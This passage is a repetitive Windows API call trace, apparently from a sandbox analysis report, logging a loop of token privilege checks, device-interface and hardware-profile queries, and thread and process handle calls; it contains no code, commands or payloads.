TokenHandle=0x18fe80*=0x0) returned 0 [0016.989] GetLastError () returned 0x3f0 [0016.989] GetCurrentProcess () returned 0xffffffff [0016.989] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.989] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.989] SetLastError (dwErrCode=0x522) [0016.989] CloseHandle (hObject=0x114) returned 1 [0016.989] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.989] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.989] GetLastError () returned 0x578 [0016.989] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.989] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.989] GetCurrentThread () returned 0xfffffffe [0016.989] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.989] GetLastError () returned 0x3f0 [0016.989] GetCurrentProcess () returned 0xffffffff [0016.989] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.989] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.989] SetLastError (dwErrCode=0x522) [0016.989] CloseHandle (hObject=0x114) returned 1 [0016.989] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.989] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.989] GetLastError () returned 0x578 [0016.989] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.989] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.989] GetCurrentThread () returned 0xfffffffe [0016.989] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.989] GetLastError () returned 0x3f0 [0016.989] GetCurrentProcess () returned 0xffffffff [0016.989] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.989] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.989] SetLastError (dwErrCode=0x522) [0016.989] CloseHandle (hObject=0x114) returned 1 [0016.989] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.989] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.989] GetLastError () returned 0x578 [0016.989] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.989] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.989] GetCurrentThread () returned 0xfffffffe [0016.989] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.989] GetLastError () returned 0x3f0 [0016.989] GetCurrentProcess () returned 0xffffffff [0016.989] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.990] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.990] SetLastError (dwErrCode=0x522) [0016.990] CloseHandle (hObject=0x114) returned 1 [0016.990] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.990] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.990] GetLastError () returned 0x578 [0016.990] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.990] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.990] GetCurrentThread () returned 0xfffffffe [0016.990] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.990] GetLastError () returned 0x3f0 [0016.990] GetCurrentProcess () returned 0xffffffff [0016.990] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.990] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.990] SetLastError (dwErrCode=0x522) [0016.990] CloseHandle (hObject=0x114) returned 1 [0016.990] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.990] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.990] GetLastError () returned 0x578 [0016.990] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.990] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.990] GetCurrentThread () returned 0xfffffffe [0016.990] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.990] GetLastError () returned 0x3f0 [0016.990] GetCurrentProcess () returned 0xffffffff [0016.990] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.990] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.990] SetLastError (dwErrCode=0x522) [0016.990] CloseHandle (hObject=0x114) returned 1 [0016.990] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.990] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.990] GetLastError () returned 0x578 [0016.990] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.990] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.990] GetCurrentThread () returned 0xfffffffe [0016.990] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.990] GetLastError () returned 0x3f0 [0016.990] GetCurrentProcess () returned 0xffffffff [0016.990] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.990] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.990] SetLastError (dwErrCode=0x522) [0016.990] CloseHandle (hObject=0x114) returned 1 [0016.991] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.991] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.991] GetLastError () returned 0x578 [0016.991] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.991] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.991] GetCurrentThread () returned 0xfffffffe [0016.991] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.991] GetLastError () returned 0x3f0 [0016.991] GetCurrentProcess () returned 0xffffffff [0016.991] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.991] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.991] SetLastError (dwErrCode=0x522) [0016.991] CloseHandle (hObject=0x114) returned 1 [0016.991] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.991] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.991] GetLastError () returned 0x578 [0016.991] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.991] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.991] GetCurrentThread () returned 0xfffffffe [0016.991] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.991] GetLastError () returned 0x3f0 [0016.991] GetCurrentProcess () returned 0xffffffff [0016.991] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.991] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.991] SetLastError (dwErrCode=0x522) [0016.991] CloseHandle (hObject=0x114) returned 1 [0016.991] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.991] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.991] GetLastError () returned 0x578 [0016.991] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.991] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.991] GetCurrentThread () returned 0xfffffffe [0016.991] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.991] GetLastError () returned 0x3f0 [0016.991] GetCurrentProcess () returned 0xffffffff [0016.991] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.991] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.991] SetLastError (dwErrCode=0x522) [0016.991] CloseHandle (hObject=0x114) returned 1 [0016.991] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.991] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.991] GetLastError () returned 0x578 [0016.991] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.992] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.992] GetCurrentThread () returned 0xfffffffe [0016.992] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.992] GetLastError () returned 0x3f0 [0016.992] GetCurrentProcess () returned 0xffffffff [0016.992] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.992] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.992] SetLastError (dwErrCode=0x522) [0016.992] CloseHandle (hObject=0x114) returned 1 [0016.992] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.992] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.992] GetLastError () returned 0x578 [0016.992] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.992] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.992] GetCurrentThread () returned 0xfffffffe [0016.992] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.992] GetLastError () returned 0x3f0 [0016.992] GetCurrentProcess () returned 0xffffffff [0016.992] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.992] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.992] SetLastError (dwErrCode=0x522) [0016.992] CloseHandle (hObject=0x114) returned 1 [0016.992] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.992] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.992] GetLastError () returned 0x578 [0016.992] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.992] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.992] GetCurrentThread () returned 0xfffffffe [0016.992] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.992] GetLastError () returned 0x3f0 [0016.992] GetCurrentProcess () returned 0xffffffff [0016.992] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.992] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.992] SetLastError (dwErrCode=0x522) [0016.992] CloseHandle (hObject=0x114) returned 1 [0016.992] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.992] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.992] GetLastError () returned 0x578 [0016.992] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.992] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.992] GetCurrentThread () returned 0xfffffffe [0016.992] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.992] GetLastError () returned 0x3f0 [0016.992] GetCurrentProcess () returned 0xffffffff [0016.993] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.993] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.993] SetLastError (dwErrCode=0x522) [0016.993] CloseHandle (hObject=0x114) returned 1 [0016.993] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.993] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.993] GetLastError () returned 0x578 [0016.993] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.993] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.993] GetCurrentThread () returned 0xfffffffe [0016.993] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.993] GetLastError () returned 0x3f0 [0016.993] GetCurrentProcess () returned 0xffffffff [0016.993] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.993] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.993] SetLastError (dwErrCode=0x522) [0016.993] CloseHandle (hObject=0x114) returned 1 [0016.993] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.993] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.993] GetLastError () returned 0x578 [0016.993] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.993] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.993] GetCurrentThread () returned 0xfffffffe [0016.993] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.993] GetLastError () returned 0x3f0 [0016.993] GetCurrentProcess () returned 0xffffffff [0016.993] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.993] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.993] SetLastError (dwErrCode=0x522) [0016.993] CloseHandle (hObject=0x114) returned 1 [0016.993] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.993] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.993] GetLastError () returned 0x578 [0016.993] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.993] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.993] GetCurrentThread () returned 0xfffffffe [0016.993] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.993] GetLastError () returned 0x3f0 [0016.993] GetCurrentProcess () returned 0xffffffff [0016.993] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.993] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.993] SetLastError (dwErrCode=0x522) [0016.993] CloseHandle (hObject=0x114) returned 1 [0016.994] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.994] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.994] GetLastError () returned 0x578 [0016.994] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.994] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.994] GetCurrentThread () returned 0xfffffffe [0016.994] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.994] GetLastError () returned 0x3f0 [0016.994] GetCurrentProcess () returned 0xffffffff [0016.994] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.994] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.994] SetLastError (dwErrCode=0x522) [0016.994] CloseHandle (hObject=0x114) returned 1 [0016.994] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.994] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.994] GetLastError () returned 0x578 [0016.994] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.994] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.994] GetCurrentThread () returned 0xfffffffe [0016.994] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.994] GetLastError () returned 0x3f0 [0016.994] GetCurrentProcess () returned 0xffffffff [0016.994] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.994] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.994] SetLastError (dwErrCode=0x522) [0016.994] CloseHandle (hObject=0x114) returned 1 [0016.994] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.994] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.994] GetLastError () returned 0x578 [0016.994] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.994] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.994] GetCurrentThread () returned 0xfffffffe [0016.994] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.994] GetLastError () returned 0x3f0 [0016.994] GetCurrentProcess () returned 0xffffffff [0016.994] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.994] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.994] SetLastError (dwErrCode=0x522) [0016.994] CloseHandle (hObject=0x114) returned 1 [0016.994] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.994] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.994] GetLastError () returned 0x578 [0016.994] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.994] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.995] GetCurrentThread () returned 0xfffffffe [0016.995] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.995] GetLastError () returned 0x3f0 [0016.995] GetCurrentProcess () returned 0xffffffff [0016.995] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.995] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.995] SetLastError (dwErrCode=0x522) [0016.995] CloseHandle (hObject=0x114) returned 1 [0016.995] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.995] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.995] GetLastError () returned 0x578 [0016.995] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.995] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.995] GetCurrentThread () returned 0xfffffffe [0016.995] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.995] GetLastError () returned 0x3f0 [0016.995] GetCurrentProcess () returned 0xffffffff [0016.995] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.995] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.995] SetLastError (dwErrCode=0x522) [0016.995] CloseHandle (hObject=0x114) returned 1 [0016.995] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.995] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.995] GetLastError () returned 0x578 [0016.995] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.995] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.995] GetCurrentThread () returned 0xfffffffe [0016.995] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, 